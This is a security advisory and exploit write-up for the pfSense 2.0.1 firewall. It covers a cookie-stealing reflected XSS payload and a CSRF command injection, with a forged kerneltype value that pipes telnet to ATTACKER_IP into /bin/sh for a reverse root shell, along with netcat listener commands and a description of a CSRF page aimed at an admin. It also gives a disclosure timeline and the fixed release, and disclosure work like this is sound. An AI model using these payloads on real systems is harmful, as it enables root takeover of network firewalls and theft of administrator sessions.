###################################################################### # Exploit Title: pfSense 2.0.1 XSS & CSRF Remote root Access # Date: 04/01/2013 # Author: Yann CAM @ Synetis # Vendor or Software Link: www.pfsense.org # Version: 2.0.1 # Category: XSS & CSRF Remote root Access # Google dork: # Tested on: FreeBSD ###################################################################### pfSense firewall/router distribution description : ====================================================================== pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. In version 2.0.1 of the distribution, differents vulnerabilities XSS & CSRF RCE reverse root shell can be used. It is strongly advised to update to version 2.0.2 available now. Proof of Concept 1 : ====================================================================== Potential XSS protected with CSRFMagic with information disclosure : File /usr/local/www/progress.php lines 21-30 : $X = upload_progress_meter_get_info( $_GET["UPLOAD_IDENTIFIER"] ); if (!$X) { if ( array_key_exists( "e", $_GET ) ) { echo "" . gettext("Invalid Meter ID") . "! {$_GET["UPLOAD_IDENTIFIER"]}"; echo (''); }else{ echo (''); } exit; Result with a direct call to this page : Fatal error: Call to undefined function upload_progress_meter_get_info() in /usr/local/www/progress.php on line 21 Proof of Concept 2 : ====================================================================== XSS non-persistent : File /usr/local/www/pkg_mgr_install.php line 166 : update_output_window(sprintf(gettext("Could not find %s."), $_GET['pkg'])); PoC : http://pfsense_url/pkg_mgr_install.php?mode=installedinfo&pkg=x%22;alert(document.cookie);this.document.forms[0].output.value+=%22 Proof of Concept 3 : ====================================================================== CSRF exploit to Remote Command Execution in root context : File /usr/local/www/system_firware.php line 118 (because this script isn't protected with CSRFMagic) : if($_POST['kerneltype']) { if($_POST['kerneltype'] == "single") system("touch /boot/kernel/pfsense_kernel.txt"); else system("echo {$_POST['kerneltype']} > /boot/kernel/pfsense_kernel.txt"); // vulnerability here } It's the more dangerous vulnerability. By this way, it's possible to an attacker to gain a full interactive reverse shell through a CSRF attack. Default valid command : echo SMP > /boot/kernel/pfsense_kernel.txt Forged $_POST['kerneltype'] variable for RCE command to generate : SMP > /boot/kernel/pfsense_kernel.txt;telnet ATTACKER_IP 1337 | /bin/sh | telnet ATTACKER_IP 1338 Attacker need to put two netcat in listen mode on his computer : nc -l -vv -p 1337 # to send command nc -l -vv -p 1338 # to read results You can see this exploitation in this demonstration video just made as proof of concept here: http://www.youtube.com/watch?feature=player_embedded&v=qnmalMrrUF4 CSRF generator to Reverse root shell :

CSRF pfSense 2.0.1 to root RCE (reverse shell)

pfSense 2.0.1, the latest firewall/router distribution based on FreeBSD is vulnerable to a CSRF attack that allows gaining root access through a reverse shell.
The attacker must know the URL address of pfsense WebGui.
To obtain the reverseshell, attacker must place two netcat in listening mode on two different ports. One will be used to send commands and the other for receiving results.
On attacker machine :

nc -l -vv -p 1337 # First netcat listener, to enter shell command.
nc -l -vv -p 1338 # Second netcat listener, to receive commands results.
(admin hash is in the /config/config.xml file on pfSense)

URL's pfSense 2.0.1 Targeted :
Attacker IP (reverse shell) :
Attacker binded port to send commands :
Attacker binded port to read results :
CSRF exploit to send to an admin :
Solution: ====================================================================== 2012-12-21: Release 2.0.2 Additional resources : ====================================================================== - www.pfsense.org - www.synetis.com - www.synetis.com/2012/11/12/contribution-au-pare-feu-routeur-pfsense - www.asafety.fr/vuln-exploit-poc/xss-csrf-rce-pfsense-2-0-1-remote-root-access - www.youtube.com/watch?feature=player_embedded&v=qnmalMrrUF4 - github.com/bsdperimeter/pfsense/commit/73b9d3c60a337ab0fe979958990a717288844ddd - github.com/bsdperimeter/pfsense/commit/33ba41314b5e78c16562365826aef9118f370e46 Report timeline : ====================================================================== 2012-10-02 : Team alerted with many details, PoC, video and potential solution 2012-10-04 : Team response with correction links into git repository 2012-10-05 : Our feedback concerning their corrections 2012-12-10 : Answer about the next release date of the 2.0.2 (no response) 2012-12-21 : Release 2.0.2 2013-01-04 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ synetis Last word : ====================================================================== Thank you to all the pfSense team for professionalism and quality solution despite of these few minor weaknesses. -- SYNETIS CONTACT: www.synetis.com